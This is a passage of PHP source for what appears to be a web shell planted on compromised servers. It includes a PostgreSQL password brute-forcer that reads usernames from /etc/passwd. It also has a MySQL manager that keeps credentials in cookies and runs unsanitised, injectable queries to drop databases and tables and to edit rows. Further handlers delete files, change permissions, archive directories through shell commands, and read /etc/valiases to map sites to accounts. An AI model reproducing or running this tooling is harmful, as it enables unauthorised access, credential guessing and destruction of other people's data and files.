5617 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
5618 $res = @pg_connect($str);
5619 @pg_close($res);
5620 return $res;
5621 }
5622 }
5623
5624 $success = 0;
5625 $attempts = 0;
5626 $server = explode(":", $_GET['server']);
5627
5628 if($_GET['type'] == 1)
5629 {
5630 $temp = @file('/etc/passwd');
5631 if( is_array($temp))
5632 foreach($temp as $line)
5633 {
5634 $line = explode(":", $line);
5635 ++$attempts;
5636 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
5637 {
5638 $success++;
5639 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
5640 }
5641 if(@$_GET['reverse'])
5642 {
5643 $tmp = "";
5644 for($i=strlen($line[0])-1; $i>=0; --$i)
5645 $tmp .= $line[0][$i];
5646 ++$attempts;
5647 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
5648 {
5649 $success++;
5650 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
5651 }
5652 }
5653 }
5654 }
5655 elseif($_GET['type'] == 2)
5656 {
5657 $temp = @file($_GET['dict']);
5658 if( is_array($temp) )
5659 foreach($temp as $line)
5660 {
5661 $line = trim($line);
5662 ++$attempts;
5663 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
5664 {
5665 $success++;
5666 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
5667 }
5668 }
5669 }
5670 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
5671}
5672// Execute Query
5673else if(isset($_GET["executeit"]))
5674{
5675 if(isset($_GET['username']) && isset($_GET['server']))
5676 {
5677 $dbserver = $_GET['server'];
5678 $dbuser = $_GET['username'];
5679 $dbpass = $_GET['password'];
5680 if(mysql_connect($dbserver,$dbuser,$dbpass))
5681 {
5682 setcookie("dbserver", $dbserver);
5683 setcookie("dbuser", $dbuser);
5684 setcookie("dbpass", $dbpass);
5685
5686 listdatabase();
5687 }
5688 else
5689 echo "cannotconnect";
5690 }
5691}
5692else if(isset($_GET['action']) && isset($_GET['dbname']))
5693
5694
5695 {
5696 if($_GET['action'] == "createDB")
5697 {
5698 $dbname = $_GET['dbname'];
5699 $dbserver = $_COOKIE["dbserver"];
5700 $dbuser = $_COOKIE["dbuser"];
5701 $dbpass = $_COOKIE["dbpass"];
5702 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5703 mysql_query("create database $dbname",$mysqlHandle);
5704 listdatabase();
5705 }
5706 if($_GET['action'] == 'dropDB')
5707 {
5708 $dbname = $_GET['dbname'];
5709 $dbserver = $_COOKIE["dbserver"];
5710 $dbuser = $_COOKIE["dbuser"];
5711 $dbpass = $_COOKIE["dbpass"];
5712 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5713 mysql_query("drop database $dbname",$mysqlHandle);
5714 mysql_close($mysqlHandle);
5715 listdatabase();
5716 }
5717
5718 if($_GET['action'] == 'listTables')
5719 {
5720 listtable();
5721 }
5722
5723 // Create Tables
5724 if($_GET['action'] == "createtable")
5725 {
5726 $dbserver = $_COOKIE["dbserver"];
5727 $dbuser = $_COOKIE["dbuser"];
5728 $dbpass = $_COOKIE["dbpass"];
5729 $dbname = $_GET['dbname'];
5730 $tablename = $_GET['tablename'];
5731 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5732 mysql_select_db($dbname);
5733 mysql_query("CREATE TABLE $tablename ( no INT )");
5734 listtable();
5735 }
5736
5737 // Drop Tables
5738 if($_GET['action'] == "dropTable")
5739 {
5740 $dbserver = $_COOKIE["dbserver"];
5741 $dbuser = $_COOKIE["dbuser"];
5742 $dbpass = $_COOKIE["dbpass"];
5743 $dbname = $_GET['dbname'];
5744 $tablename = $_GET['tablename'];
5745 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5746 mysql_select_db($dbname);
5747 mysql_query("drop table $tablename");
5748 listtable();
5749 }
5750
5751 // Empty Tables
5752 if($_GET['action'] == "empty")
5753 {
5754 $dbserver = $_COOKIE["dbserver"];
5755 $dbuser = $_COOKIE["dbuser"];
5756 $dbpass = $_COOKIE["dbpass"];
5757 $dbname = $_GET['dbname'];
5758 $tablename = $_GET['tablename'];
5759 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5760 mysql_select_db($dbname);
5761 mysql_query("delete from $tablename");
5762 listtable();
5763 }
5764
5765 // Empty Tables
5766 if($_GET['action'] == "dropField")
5767 {
5768 $dbserver = $_COOKIE["dbserver"];
5769 $dbuser = $_COOKIE["dbuser"];
5770 $dbpass = $_COOKIE["dbpass"];
5771 $dbname = $_GET['dbname'];
5772 $tablename = $_GET['tablename'];
5773 $fieldname = $_GET['fieldname'];
5774 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5775 mysql_select_db($dbname);
5776 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
5777 mysql_select_db( $dbname, $mysqlHandle );
5778 mysql_query( $queryStr , $mysqlHandle );
5779 listtable();
5780 }
5781
5782 if($_GET['action'] == 'viewdb')
5783 {
5784 listdatabase();
5785 }
5786
5787 // View Table Schema
5788 if($_GET['action'] == "viewSchema")
5789 {
5790 $dbserver = $_COOKIE["dbserver"];
5791 $dbuser = $_COOKIE["dbuser"];
5792 $dbpass = $_COOKIE["dbpass"];
5793 $dbname = $_GET['dbname'];
5794 $tablename = $_GET['tablename'];
5795 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5796 mysql_select_db($dbname);
5797 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5798 $pResult = mysql_query( "SHOW fields FROM $tablename" );
5799 $num = mysql_num_rows( $pResult );
5800 echo "<br><br><table class=btmtbl align=center cellspacing=4 style='width:80%;' border=1>";
5801 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
5802 for( $i = 0; $i < $num; $i++ )
5803 {
5804 $field = mysql_fetch_array( $pResult );
5805 echo "<tr>\n";
5806 echo "<td>".$field["Field"]."</td>\n";
5807 echo "<td>".$field["Type"]."</td>\n";
5808 echo "<td>".$field["Null"]."</td>\n";
5809 echo "<td>".$field["Key"]."</td>\n";
5810 echo "<td>".$field["Default"]."</td>\n";
5811 echo "<td>".$field["Extra"]."</td>\n";
5812 $fieldname = $field["Field"];
5813 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
5814 echo "</tr>\n";
5815 }
5816 echo "</table>";
5817 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5818 }
5819
5820 // Execute Query
5821 if($_GET['action'] == "executequery")
5822 {
5823 $dbserver = $_COOKIE["dbserver"];
5824 $dbuser = $_COOKIE["dbuser"];
5825 $dbpass = $_COOKIE["dbpass"];
5826 $dbname = $_GET['dbname'];
5827 $tablename = $_GET['tablename'];
5828 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5829 mysql_select_db($dbname);
5830 $result = mysql_query($_GET['executemyquery']);
5831
5832 // results
5833 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
5834
5835 $count = 0;
5836 while ($row = mysql_fetch_assoc($result))
5837 {
5838 echo "<tr>\r\n";
5839
5840 if ($count==0) // list column names
5841 {
5842 echo "<tr>\r\n";
5843 while($key = key($row))
5844 {
5845 echo "<td><b>" . $key . "</b></td>\r\n";
5846 next($row);
5847 }
5848 echo "</tr>\r\n";
5849 }
5850
5851 foreach($row as $r) // list content of column names
5852 {
5853 if ($r=='') $r = '<font >NULL</font>';
5854 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
5855 }
5856 echo "</tr>\r\n";
5857 $count++;
5858 }
5859 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
5860 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5861 }
5862
5863 // View Table Data
5864 if($_GET['action'] == "viewdata")
5865 {
5866 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
5867 $dbserver = $_COOKIE["dbserver"];
5868 $dbuser = $_COOKIE["dbuser"];
5869 $dbpass = $_COOKIE["dbpass"];
5870 $dbname = $_GET['dbname'];
5871 $tablename = $_GET['tablename'];
5872 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5873 ?>
5874 <br><br>
5875 <form>
5876 <table>
5877 <tr>
5878 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
5879 </tr>
5880 <tr>
5881 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
5882 </tr>
5883 </table>
5884 </form>
5885 <?php
5886 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5887 mysql_select_db($dbname);
5888
5889 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5890 $row = mysql_fetch_array($sql);
5891 $rowid = $row['COLUMN_NAME'];
5892
5893 echo "<br><font size=4>Data in Table</font><br>";
5894 if( $tablename != "" )
5895 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
5896 else
5897 echo "<font size=3 class=txt>$dbname</font><br>";
5898
5899 $queryStr = "";
5900 $pag = 0;
5901 $queryStr = stripslashes( $queryStr );
5902 if( $queryStr == "" )
5903 {
5904 if(isset($_REQUEST['page']))
5905 {
5906 $res = mysql_query("select * from $tablename");
5907 $getres = mysql_num_rows($res);
5908 $coun = ceil($getres/30);
5909 if($_REQUEST['page'] != 1)
5910
5911 $pag = $_REQUEST['page'] * 30;
5912 else
5913 $pag = $_REQUEST['page'] * 30;
5914
5915 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
5916 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
5917 $arrcount = 1;
5918 $arrdata[$arrcount] = 0;
5919 while($row = mysql_fetch_array($sql))
5920 {
5921 $arrdata[$arrcount] = $row[$rowid];
5922 $arrcount++;
5923 }
5924 }
5925 else
5926 {
5927 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
5928 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
5929 $arrcount = 1;
5930 $arrdata[$arrcount] = 0;
5931 while($row = mysql_fetch_array($sql))
5932 {
5933 $arrdata[$arrcount] = $row[$rowid];
5934 $arrcount++;
5935 }
5936 }
5937 if( $orderby != "" )
5938 $queryStr .= " ORDER BY $orderby";
5939 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
5940 }
5941
5942
5943 $pResult = mysql_query($queryStr );
5944 $fieldt = mysql_fetch_field($pResult);
5945 $tablename = $fieldt->table;
5946 $errMsg = mysql_error();
5947
5948 $GLOBALS[queryStr] = $queryStr;
5949
5950 if( $pResult == false )
5951 {
5952 echoQueryResult();
5953 return;
5954 }
5955 if( $pResult == 1 )
5956 {
5957 $errMsg = "Success";
5958 echoQueryResult();
5959 return;
5960 }
5961
5962 echo "<hr color='#1B1B1B'>\n";
5963
5964 $row = mysql_num_rows( $pResult );
5965 $col = mysql_num_fields( $pResult );
5966
5967 if( $row == 0 )
5968 {
5969 echo "<font size=3>No Data Exist!</font>";
5970 return;
5971 }
5972
5973 if( $rowperpage == "" ) $rowperpage = 30;
5974 if( $page == "" ) $page = 0;
5975 else $page--;
5976 mysql_data_seek( $pResult, $page * $rowperpage );
5977
5978 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 align=center>\n";
5979 echo "<tr>\n";
5980 for( $i = 0; $i < $col; $i++ )
5981 {
5982 $field = mysql_fetch_field( $pResult, $i );
5983 echo "<th>";
5984 if($action == "viewdata")
5985 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
5986 else
5987 echo $field->name."\n";
5988 echo "</th>\n";
5989 }
5990 echo "<th colspan=2>Action</th>\n";
5991 echo "</tr>\n";
5992 $num=1;
5993
5994
5995 $acount = 1;
5996
5997 for( $i = 0; $i < $rowperpage; $i++ )
5998 {
5999 $rowArray = mysql_fetch_row( $pResult );
6000 if( $rowArray == false ) break;
6001 echo "<tr>\n";
6002 $key = "";
6003 for( $j = 0; $j < $col; $j++ )
6004 {
6005 $data = $rowArray[$j];
6006
6007 $field = mysql_fetch_field( $pResult, $j );
6008 if( $field->primary_key == 1 )
6009 $key .= "&" . $field->name . "=" . $data;
6010
6011 if( strlen( $data ) > 30 )
6012 $data = substr( $data, 0, 30 ) . "...";
6013 $data = htmlspecialchars( $data );
6014 echo "<td>\n";
6015 echo "<font class=txt>$data</font>\n";
6016 echo "</td>\n";
6017 }
6018
6019 if(!is_numeric($arrdata[$acount]))
6020 echo "<td colspan=2>No Key</td>\n";
6021 else
6022 {
6023 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
6024 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
6025 $acount++;
6026 }
6027 }
6028 echo "</tr>\n";
6029
6030
6031 echo "</table>";
6032 if($arrcount > 30)
6033 {
6034 $res = mysql_query("select * from $tablename");
6035 $getres = mysql_num_rows($res);
6036 $coun = ceil($getres/30);
6037 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
6038 for($i=0;$i<$coun;$i++)
6039 echo "<option value=$i>$i</option>";
6040
6041 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
6042 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6043 }
6044 }
6045
6046 // Delete Table Data
6047 if($_GET['action'] == "deleteData")
6048 {
6049 $dbserver = $_COOKIE["dbserver"];
6050 $dbuser = $_COOKIE["dbuser"];
6051 $dbpass = $_COOKIE["dbpass"];
6052 $dbname = $_GET['dbname'];
6053 $tablename = $_GET['tablename'];
6054 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6055 mysql_select_db($dbname);
6056 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6057 $row = mysql_fetch_array($sql);
6058 $row = $row['COLUMN_NAME'];
6059 $rowid = $_GET[$row];
6060 mysql_query("delete from $tablename where $row = '$rowid'");
6061 listtable();
6062 }
6063 // Edit Table Data
6064 if($_GET['action'] == "editData")
6065 {
6066 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
6067 $dbserver = $_COOKIE["dbserver"];
6068 $dbuser = $_COOKIE["dbuser"];
6069 $dbpass = $_COOKIE["dbpass"];
6070 $dbname = $_GET['dbname'];
6071 $tablename = $_GET['tablename'];
6072 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6073 ?>
6074 <br><br>
6075 <form action="<?php echo $self; ?>" method="post">
6076 <?php
6077 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6078 mysql_select_db($dbname);
6079
6080 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6081 $row = mysql_fetch_array($sql);
6082 $row = $row['COLUMN_NAME'];
6083 $rowid = $_GET[$row];
6084
6085 $pResult = mysql_list_fields( $dbname, $tablename );
6086 $num = mysql_num_fields( $pResult );
6087
6088 $key = "";
6089 for( $i = 0; $i < $num; $i++ )
6090 {
6091 $field = mysql_fetch_field( $pResult, $i );
6092 if( $field->primary_key == 1 )
6093 if( $field->numeric == 1 )
6094 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
6095 else
6096 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
6097 }
6098 $key = substr( $key, 0, strlen($key)-4 );
6099
6100 mysql_select_db( $dbname, $mysqlHandle );
6101 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
6102 $data = mysql_fetch_array( $pResult );
6103
6104 echo "<table class=btmtbl cellspacing=1 cellpadding=2 border=1>\n";
6105 echo "<tr>\n";
6106 echo "<th>Name</th>\n";
6107 echo "<th>Type</th>\n";
6108 echo "<th>Function</th>\n";
6109 echo "<th>Data</th>\n";
6110 echo "</tr>\n";
6111
6112 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6113 $num = mysql_num_rows( $pResult );
6114
6115 $pResultLen = mysql_list_fields( $dbname, $tablename );
6116 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
6117 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
6118 for( $i = 0; $i < $num; $i++ )
6119 {
6120 $field = mysql_fetch_array( $pResult );
6121 $fieldname = $field["Field"];
6122 $fieldtype = $field["Type"];
6123 $len = mysql_field_len( $pResultLen, $i );
6124
6125 echo "<tr>";
6126 echo "<td>$fieldname</td>";
6127 echo "<td>".$field["Type"]."</td>";
6128 echo "<td>\n";
6129 echo "<select name=${fieldname}_function class=sbox>\n";
6130 echo "<option>\n";
6131 echo "<option>ASCII\n";
6132 echo "<option>CHAR\n";
6133 echo "<option>SOUNDEX\n";
6134 echo "<option>CURDATE\n";
6135 echo "<option>CURTIME\n";
6136 echo "<option>FROM_DAYS\n";
6137 echo "<option>FROM_UNIXTIME\n";
6138 echo "<option>NOW\n";
6139 echo "<option>PASSWORD\n";
6140 echo "<option>PERIOD_ADD\n";
6141 echo "<option>PERIOD_DIFF\n";
6142 echo "<option>TO_DAYS\n";
6143 echo "<option>USER\n";
6144 echo "<option>WEEKDAY\n";
6145 echo "<option>RAND\n";
6146 echo "</select>\n";
6147 echo "</td>\n";
6148 $value = htmlspecialchars($data[$i]);
6149 $type = strtok( $fieldtype, " (,)\n" );
6150 if( $type == "enum" || $type == "set" )
6151 {
6152 echo "<td>\n";
6153 if( $type == "enum" )
6154 echo "<select name=$fieldname class=box>\n";
6155 else if( $type == "set" )
6156 echo "<select name=$fieldname size=4 class=box multiple>\n";
6157 while( $str = strtok( "'" ) )
6158 {
6159 if( $value == $str )
6160 echo "<option selected>$str\n";
6161 else
6162 echo "<option>$str\n";
6163 strtok( "'" );
6164 }
6165 echo "</select>\n";
6166 echo "</td>\n";
6167 }
6168 else
6169 {
6170 if( $len < 40 )
6171 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
6172 else
6173 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
6174 }
6175 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6176 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6177 echo "</tr>";
6178 }
6179 $fundata1=eregi_replace(',$', '', $fundata1);
6180 $fundata2=eregi_replace(',$', '', $fundata2);
6181
6182 echo "</table><p>\n";
6183 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
6184 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
6185 echo "</form>\n";
6186 }
6187 }
6188// Edit Submit Table Data
6189else if($_REQUEST['action'] == "editsubmitData")
6190{
6191 $dbserver = $_COOKIE["dbserver"];
6192 $dbuser = $_COOKIE["dbuser"];
6193 $dbpass = $_COOKIE["dbpass"];
6194 $dbname = $_POST['dbname'];
6195 $tablename = $_POST['tablename'];
6196
6197 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6198 mysql_select_db($dbname);
6199
6200 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6201 $row = mysql_fetch_array($sql);
6202 $row = $row['COLUMN_NAME'];
6203 $rowid = $_POST[$row];
6204
6205 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6206 $num = mysql_num_rows( $pResult );
6207
6208 $rowcount = $num;
6209
6210 $pResultLen = mysql_list_fields( $dbname, $tablename );
6211
6212 for( $i = 0; $i < $num; $i++ )
6213 {
6214 $field = mysql_fetch_array( $pResult );
6215 $fieldname = $field["Field"];
6216 $arrdata = $_REQUEST[$fieldname];
6217
6218 $str .= " " . $fieldname . " = '" . $arrdata . "'";
6219 $rowcount--;
6220 if($rowcount != 0)
6221 $str .= ",";
6222 }
6223
6224 $str = "update $tablename set" . $str . " where $row=$rowid";
6225 mysql_query($str);
6226 ?><div id="showsql"></div><?php
6227}
6228// Insert Table Data
6229else if($_REQUEST['action'] == "insertdata")
6230{
6231 $dbserver = $_COOKIE["dbserver"];
6232 $dbuser = $_COOKIE["dbuser"];
6233 $dbpass = $_COOKIE["dbpass"];
6234 $dbname = $_POST['dbname'];
6235 $tablename = $_POST['tablename'];
6236
6237 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6238 mysql_select_db($dbname);
6239
6240 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6241 $row = mysql_fetch_array($sql);
6242 $row = $row['COLUMN_NAME'];
6243 $rowid = $_POST[$row];
6244
6245 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6246 $num = mysql_num_rows( $pResult );
6247
6248 $rowcount = $num;
6249
6250 $pResultLen = mysql_list_fields( $dbname, $tablename );
6251
6252 for( $i = 0; $i < $num; $i++ )
6253 {
6254 $field = mysql_fetch_array( $pResult );
6255 $fieldname = $field["Field"];
6256 $arrdata = $_REQUEST[$fieldname];
6257
6258 $str1 .= "".$fieldname . ",";
6259 $str2 .= "'".$arrdata . "',";
6260 $rowcount--;
6261 if($rowcount != 0)
6262 {
6263 //$str1 .= $fieldname . ",";
6264 //$str2 .= $arrdata . ",";
6265 }
6266 }
6267 $str1=eregi_replace(',$', '', $str1);
6268 $str2=eregi_replace(',$', '', $str2);
6269 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
6270 mysql_query($str);
6271
6272 ?><div id="showsql"></div><?php
6273}
6274else if(isset($_GET['logoutdb']))
6275{
6276 setcookie("dbserver",time() - 60*60);
6277 setcookie("dbuser",time() - 60*60);
6278 setcookie("dbpass",time() - 60*60);
6279 header("Location:$self");
6280}
6281else if(isset($_POST['choice']))
6282{
6283 if($_POST['choice'] == "delete")
6284 {
6285 $actbox = $_POST["actbox"];
6286 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6287
6288 foreach ($actbox as $myv)
6289 $myv = explode(",",$myv);
6290 foreach ($myv as $v)
6291 {
6292 if(is_file($v))
6293 {
6294 if(unlink($v))
6295 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
6296 else
6297 echo "<br><center>Cannot Delete File $v</center>";
6298 }
6299 else if(is_dir($v))
6300 {
6301 rrmdir($v);
6302 }
6303 }
6304 echo '<br>';
6305 }
6306 else if($_POST['choice'] == "chmod")
6307 { ?>
6308 <BR><form id="chform"><?php
6309 $actbox1 = $_POST['actbox'];
6310 foreach ($actbox1 as $myv)
6311 $myv = explode(",",$myv);
6312 foreach ($myv as $v)
6313 { ?>
6314 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
6315 <?php }
6316 ?>
6317 <table align="center" border="3" style="width:40%; border-color:#333333;">
6318 <tr>
6319 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
6320 </tr>
6321 <tr>
6322 <td colspan="2" align="center" style="height:60px">
6323 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" />
6324 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" /></form></center>
6325 </td>
6326 </tr>
6327 </table>
6328
6329 </form> <?php
6330 }
6331 else if($_POST['choice'] == "changefileperms")
6332 {
6333 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6334 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
6335 {
6336 $actbox = $_POST["actbox"];
6337 foreach ($actbox as $myv)
6338 $myv = explode(",",$myv);
6339 foreach ($myv as $v)
6340 {
6341 if(is_file($v) || is_dir($v))
6342 {
6343 $perms = 0;
6344 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
6345 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
6346 echo "<div align=left style=width:80%;>";
6347 if(@chmod($v,$perms))
6348 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
6349 else
6350 echo "Cannot Change $v File Permissions<br>";
6351 echo "</div>";
6352 }
6353 }
6354
6355 }
6356 }
6357 else if($_POST['choice'] == "compre")
6358 {
6359 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6360 $actbox = $_POST["actbox"];
6361 foreach ($actbox as $myv)
6362 $myv = explode(",",$myv);
6363 foreach ($myv as $v)
6364 {
6365 if(is_file($v))
6366 {
6367 $zip = new ZipArchive();
6368 $filename= basename($v) . '.zip';
6369 if(($zip->open($filename, ZipArchive::CREATE))!==true)
6370 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
6371 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
6372 $zip->addFile(basename($v));
6373 $zip->close();
6374 }
6375 else if(is_dir($v))
6376 {
6377 if($os == "Linux")
6378 {
6379 $filename= basename($v);
6380 execmd("tar --create --recursion --file=$filename.tar $v");
6381 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
6382 }
6383 else
6384 echo "<BR>Cannot compress directory<BR><BR>";
6385 }
6386 }
6387 echo '<BR><BR>';
6388 }
6389 else if($_POST['choice'] == "uncompre")
6390 {
6391 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6392 $actbox = $_POST["actbox"];
6393 foreach ($actbox as $myv)
6394 $myv = explode(",",$myv);
6395 foreach ($myv as $v)
6396 {
6397 if(is_file($v) || is_dir($v))
6398 {
6399 $zip = new ZipArchive;
6400 $filename= basename($v);
6401 $res = $zip->open($filename);
6402 if ($res === TRUE)
6403 {
6404 $pieces = explode(".",$filename);
6405 $zip->extractTo($pieces[0]);
6406 $zip->close();
6407 echo '<BR><font class=txt size=3>File '.$v.' Unzipped successfully</font>';
6408 } else
6409 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
6410 }
6411 }
6412 echo '<BR><BR>';
6413 }
6414}
6415else if(isset($_GET['sitename']))
6416{
6417 $sitename = str_replace("http://","",$_GET['sitename']);
6418 $sitename = str_replace("http://www.","",$sitename);
6419 $sitename = str_replace("www.","",$sitename);
6420 $show = myexe("ls -la /etc/valiases/".$sitename);
6421 if(!empty($show))
6422 echo $show;
6423 else
6424 echo "Cannot get the username";
6425}
6426else if(isset($_GET['mydata']))
6427{
6428 listdatabase();
6429}
6430else if(isset($_GET['home']))
6431{
6432 mainfun($_GET['home']);
6433}
6434else if(isset($_GET['dir']))
6435{
